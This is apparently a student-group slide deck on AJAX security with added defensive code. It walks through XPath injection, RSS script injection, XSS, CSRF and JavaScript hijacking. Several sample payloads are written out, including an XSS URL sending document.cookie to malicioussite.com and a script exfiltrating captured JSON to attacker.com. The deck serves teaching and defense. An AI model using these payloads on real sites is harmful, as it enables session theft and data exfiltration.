AJAX Security: New Trends in Web Application Attacks

scaredbacon, Software & software development

4 Jul 2012

Greg Rice
Iowa State University
Information Assurance Student Group
AJAX
- Asynchronous JavaScript And XML
- Collection of existing technologies used to enhance web development
- Rapidly increasing buzz in Web 2.0
  - Google Maps, GMail, Google Suggest
- Ability to exchange data asynchronously with the server without refreshing the page
- Increase in interactivity, speed
- Separation of data, format, style, function
- Supported by modern browsers
Conventional Web Apps
- Browser loads some HTML FORM
- User interacts with the FORM, submits a request back to the server (POST, GET)
- Server processes the client request, returns a new HTML page
Sample Conventional ASP
Form:
<html><body><h1>Conventional Form Submission</h1>
<form action="conventional.asp" method="post">
Name: <input type="text" name="name" />
Title: <input type="text" name="title" />
<input type="submit" />
</form></body></html>
Response (note that both form values are written back into the page without any encoding):
<html><body><H1>Welcome <% response.write(request.form("name")) %>!</H1>
You are one great <% response.write(request.form("title")) %> by the way.</body></html>
Sample ASP Demo
Conventional App
Note the obvious page transition
AJAX Applications
- Allows JavaScript to communicate directly with the server via the JavaScript XMLHttpRequest object
- Exchange data with the server without reloading pages
- Asynchronous HTTP requests to the server occur in the background
- Web technologies
  - XHTML\HTML\CSS - Style
  - DOM - Dynamic display of information
  - XML/JSON - Data exchange formats
  - XMLHttpRequest - Asynchronous data retrieval
  - JavaScript - Process control
[Source: J.J. Garrett]
<html><body><script type="text/javascript">
function ajaxFunction() {
  var xmlHttp;
  try {
    // Firefox, Opera 8.0+, Safari
    xmlHttp = new XMLHttpRequest();
  }
  catch (e) {
    // Internet Explorer 6+
    try {
      xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
    }
    catch (e) {
      return; // no XMLHttpRequest support in this browser
    }
  }
  xmlHttp.onreadystatechange = function() {
    if (xmlHttp.readyState == 4) {
      // the raw response body is copied straight into the form field
      document.myForm.time.value = xmlHttp.responseText;
    }
  }
  xmlHttp.open("GET", "time.asp", true);
  xmlHttp.send(null);
}
</script><h1>AJAX Form</h1><form name="myForm">
Name: <input type="text" onkeyup="ajaxFunction();" name="name" />
Time: <input type="text" name="time" /></form></body></html>

time.asp, the resource fetched in the background:
<%
response.expires=-1
response.write(time)
%>
Sample AJAX Demo
AJAX Enhanced App
No page transition!
XML Exchange Example
[Source: OWASP]
XML Upstream Exchange
[Source: OWASP]
[Source: J.J. Garrett]
AJAX Security Implications
- Client-side security controls (which the attacker fully controls)
- Increased attack surface: many small server endpoints instead of a few form handlers
- Bridging the gap between user and service
- Requests issued by JavaScript and requests issued by the user look identical to the server, which gives XSS new leverage
XML Injection Attacks
- Once again epitomizes the importance of input validation at the server
- Attackers pass an intentionally malformed payload to the server
- May allow the attacker to determine how the XML data is structured, gain access to private XML data, or simply poison the XML data
<?xml version="1.0" encoding="utf-8"?>
<Employees>
  <Employee ID="1">
    <FirstName>Arnold</FirstName>
    <LastName>Baker</LastName>
    <UserName>ABaker</UserName>
    <Password>SoSecret</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Peter</FirstName>
    <LastName>Pan</LastName>
    <UserName>PPan</UserName>
    <Password>NotTelling</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Login lookup that splices the request parameters straight into an XPath query (ASP/VBScript):
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username") & "' and Password/text()='" & Request("Password") & "']"

Username: blah' or 1=1 or 'a'='a
Password: blah

FindUserXPath = "//Employee[UserName/text()='blah' or 1=1 or 'a'='a' and Password/text()='blah']"

Logical equivalence (in XPath, and binds tighter than or):
//Employee[(UserName/text()='blah' or 1=1) or ('a'='a' and Password/text()='blah')]

The predicate is true for every Employee, so the query matches all of them and the first result, the Admin record, is returned without a valid password.
[Source: OWASP]
[Source: OWASP]
Countermeasures
- Server-side input validation
- Pre-compiled XPath queries with bound variables instead of string concatenation
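The slide shows the query built by concatenation; the block below is an added example (not from the slides) that rebuilds the same query two ways and then shows the XPath 1.0 quoting rule a concatenating application must follow if it cannot bind variables. XPath 1.0 has no escape character inside a string literal, so a value containing both quote kinds must be emitted as a concat() of pieces. Function names and the sample inputs are assumptions for this example; no XPath engine is invoked, only the query text is produced.

```javascript
// Added example: building the slide's login XPath safely.

// Vulnerable construction, exactly as on the slide: raw input spliced in.
function buildLoginXPathUnsafe(username, password) {
  return "//Employee[UserName/text()='" + username +
         "' and Password/text()='" + password + "']";
}

// XPath 1.0 string literal for an arbitrary value. Use whichever quote the
// value does not contain; if it contains both, split on ' and glue the pieces
// back together with concat(), inserting a double-quoted "'" between them.
function xpathStringLiteral(value) {
  const s = String(value);
  if (!s.includes("'")) return "'" + s + "'";
  if (!s.includes('"')) return '"' + s + '"';
  const parts = s.split("'").map(p => "'" + p + "'");
  return 'concat(' + parts.join(', "\'", ') + ')';
}

// Same query, but every user-supplied value is a single XPath literal, so no
// input can close the literal and append "or 1=1".
function buildLoginXPathSafe(username, password) {
  return '//Employee[UserName/text()=' + xpathStringLiteral(username) +
         ' and Password/text()=' + xpathStringLiteral(password) + ']';
}

// Defence in depth: usernames in the slide's data are plain identifiers, so an
// allow-list rejects injection payloads before any query is built.
function isValidUsername(username) {
  return /^[A-Za-z0-9_]{1,32}$/.test(String(username));
}
```

Binding variables (the "pre-compiled" countermeasure) is still preferable where the XPath API offers it, because the literal-quoting function only protects string comparisons; a value dropped into a numeric or node-name position needs its own validation.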
RSS Feed Injection
- RSS\Atom feeds allow a user or website to obtain content headlines without visiting the site in question
- Problem: trusting third-party content
- Most RSS readers do not sanitize input; some even store/execute the feed in the local zone, where script has more privileges than in an ordinary web page
<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0">
<channel>
<title><script>alert('Channel Title')</script></title>
<link>http://www.mycoolsite.com/</link>
<description><script>alert('Channel Description')</script></description>
<language>en-us</language>
<copyright>MrCool 2006</copyright>
<item>
<title><script>alert('Item Title')</script></title>
<link>http://www.mycoolsite.com/lonely.html</link>
<description><script>alert('Item Description')</script></description>
<pubDate>Thu, 22 Jun 2006 11:08:14 EDT</pubDate>
<guid>http://mysite/Mrguid</guid>
</item>
</channel>
</rss>

Beyond an alert(), script carried in a feed field runs with whatever privileges the reader grants it; this payload uses the reader's XMLHttpRequest to POST to a third site and read the response back:
<script>
var post_data = 'name=value';
var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
xmlhttp.open("POST", 'http://attackedhost/foo/bar.php', true);
xmlhttp.onreadystatechange = function () {
  if (xmlhttp.readyState == 4) {
    alert(xmlhttp.responseText);
  }
};
xmlhttp.send(post_data);
</script>
Countermeasures
- Input validation of special tags
- White-listing of allowable HTML tags
- End users should disable script, applet, and plug-in extensions in the feed reader
Cross-Site Scripting
- Recall that web browsers execute client-side JavaScript, Flash
- Reflected XSS Attack: user input data appears in dynamic web content without HTML encoding, allowing client-side code to be injected into the dynamic page
- Stored XSS Attack: malicious input data is stored on the web server and appears for all other users viewing the page
XSS Attack Samples
- Normal URL Query: http://www.host.com/query.php?var=insecure
- XSS Attack Query:
http://www.host.com/query.php?var=''><script>document.location='http://www.malicioussite.com/cgi-bin/cookietheft.cgi?'%20+document.cookie</script>
Next Generation XSS Attacks
- Web 1.0 XSS
  - Manual injection by attacker
  - Reflected: previously attackers needed to trick the victim into opening a malicious URL
  - Stored: developers could filter tags
- Web 2.0 XSS
  - Asynchronous communication much more complicated, difficult to notice
  - Malicious payloads dynamically created by JavaScript, parsed by JavaScript
  - Dynamically written to the page
  - XSS can now propagate
Sample AJAX Exchange
[Source: OWASP]
Example XSS Attack
- Scenario: users enter some content that is later exchanged via an AJAX JavaScript array
var downstreamArray = new Array();
downstreamArray[0] = "Greg";
- Attacker inserts XSS attack: the submitted value is Greg"; doBad(); var bar = "whatever, which closes the string literal, calls doBad(), and opens a new literal so the script still parses
var downstreamArray = new Array();
downstreamArray[0] = "Greg"; doBad();
var bar = "whatever";
Countermeasures
- Input validation - COMPLEX!
  - Dangerous character set much larger
  - Multiple means of escaping
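The countermeasures above, and the white-listing countermeasure in the RSS Feed Injection section, both come down to encoding for the context the data lands in. The block below is an added example (not from the slides) with three encoders: plain HTML encoding for reflected and stored XSS, an allow-list sanitizer for feed content that escapes everything and then restores only bare, attribute-free tags from a fixed list, and a JavaScript-string encoder for the downstreamArray case, where HTML encoding would not help because the data sits inside a script. Function names, the allowed-tag list and the sample inputs are assumptions for this example.

```javascript
// Added example: context-specific output encoding.

// 1. HTML body context: the five characters that let text break out of a
//    text node or an attribute value.
function encodeForHtml(text) {
  return String(text).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;'
  })[c]);
}

// 2. Feed/reader context: allow-list approach. Escape the whole string first,
//    then put back only exact, attribute-free tags from the list. A <script>
//    element, an onclick= attribute or a <b onmouseover=...> never survives.
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'p', 'br'];
function sanitizeFeedHtml(html) {
  let out = encodeForHtml(html);
  for (const tag of ALLOWED_TAGS) {
    out = out.replace(new RegExp('&lt;(/?)' + tag + '&gt;', 'gi'), '<$1' + tag + '>');
  }
  return out;
}

// 3. JavaScript string context (the AJAX array on the slide). JSON.stringify
//    yields a valid JS string literal; the extra replacements keep the value
//    from ever containing </script, <!-- or a JS line terminator.
function encodeForJsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Emit the downstream array the way the slide's server does, but encoded.
function buildDownstreamArray(values) {
  const lines = ['var downstreamArray = new Array();'];
  values.forEach((v, i) => {
    lines.push('downstreamArray[' + i + '] = ' + encodeForJsString(v) + ';');
  });
  return lines.join('\n');
}

// Runs the generated script the way the browser would and hands back the
// array; a successful injection would throw (doBad is not defined).
function loadDownstreamArray(values) {
  return new Function(buildDownstreamArray(values) + '\nreturn downstreamArray;')();
}
```

The allow-list sanitizer is deliberately strict: a tag with any attribute, even a harmless one, stays escaped rather than being parsed, because parsing attributes correctly is where ad hoc sanitizers usually fail.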
Cross-Site Request Forgery
- Allows control of the web application as the authenticated victim
- Typically depends on an active session
- Attacker injects AJAX requests on behalf of the victim, writing sensitive data
XSRF Attack Example
1. Victim logs in to an AJAX-enabled banking website, receives a session cookie
2. In a separate tab, the victim continues browsing the web
3. With the session still valid, the victim unknowingly browses to a malicious web site
4. The malicious site contains hidden forms targeting the banking website, submitted into iFrames so nothing visible changes
5. The browser attaches the victim's session cookie to each forged request, so the bank treats them as the victim's own AJAX requests
6. Transactions are silent! No page updates!
Countermeasures
- Add a cryptographic session token (a secret the attacker's page cannot read) to all important AJAX requests, and verify it on the server
- Do not change application state on GET requests, since GET is the request type that img, script and iframe tags can issue across domains
JavaScript Hijacking
- Problem: JavaScript hosted on any site can be included and executed in the context of another site
- Scenario: trick the victim into visiting a malicious website again
- The attacking site redefines the JavaScript that the AJAX response is built from (here, the Object constructor) to redirect confidential data to the attacker
var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json", true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    // eval() of the raw response is what makes the JSON behave as a script
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@fortifysoftware.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@fortifysoftware.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@fortifysoftware.com" }]
<script>
// override the constructor used to create all objects
// (legacy Firefox setter syntax; relies on object literals invoking this constructor)
function Object() {
  this.email setter = captureObject;
}
// Send the captured object back to the attacker's Web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" + escape(objString), true);
  req.send(null);
}
</script>
<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>
Countermeasures
- Add a cryptographic session token to all important AJAX requests, including the GET that fetches the JSON
- Include a response prefix to prevent direct execution of the response as a script
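The response-prefix countermeasure, as an added example (not from the slides). The server prepends a short sequence that is a syntax error when the body is pulled in with a <script src> tag, while the site's own XMLHttpRequest handler strips it and uses JSON.parse instead of the eval() shown on the earlier slide. The exact prefix string, the helper names and the sample records are assumptions for this example; an infinite-loop prefix such as while(1); is the other common choice and works the same way at the client.

```javascript
// Added example: making a JSON response unusable as a cross-site script.
const JSON_PREFIX = ")]}',\n";

// Server side: prefix every JSON body that carries per-user data.
function serializeProtected(records) {
  return JSON_PREFIX + JSON.stringify(records);
}

// Client side, in the site's own XHR handler: insist on the prefix, strip it,
// and parse. JSON.parse never executes code, unlike eval("(" + txt + ")").
function parseProtected(responseText) {
  if (!responseText.startsWith(JSON_PREFIX)) {
    throw new Error('unexpected response format');
  }
  return JSON.parse(responseText.slice(JSON_PREFIX.length));
}

// What happens when the attacker's page includes the body via <script src>:
// the engine must first parse it as a script. new Function compiles without
// running, so this reports whether the script stage would get past parsing.
function parsesAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false;
  }
}
```

Without the prefix the plain array literal parses fine as a script, which is exactly what the Object-constructor trick on the previous slide needed; with it, parsing fails before any array or object literal is evaluated.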
Other Popular Attacks
- SQL\Command Injection
- WSDL Enumeration
- Ignore Client-Side Input Validation
- Error Handling Enumeration
- SOAP Parameter Tampering
- Reverse Engineering Binary Clients
Future Web App Trends
- AJAX toolkits increasing in popularity
- Increased attack surface: leveraging old attacks, and now new ones
- More difficult to secure, but also more difficult to penetrate
- Testing tools: WebScarab, Paros (intercepting proxies); Firebug (in-browser inspection of requests and the DOM)
- Movement towards online apps necessitates a stronger need for AJAX security understanding
Best Practices
- Never trust user input, even when client-side validation is enabled
- Disable any additional unneeded services or apps
- Learn more: WebGoat, OWASP
- Assess and audit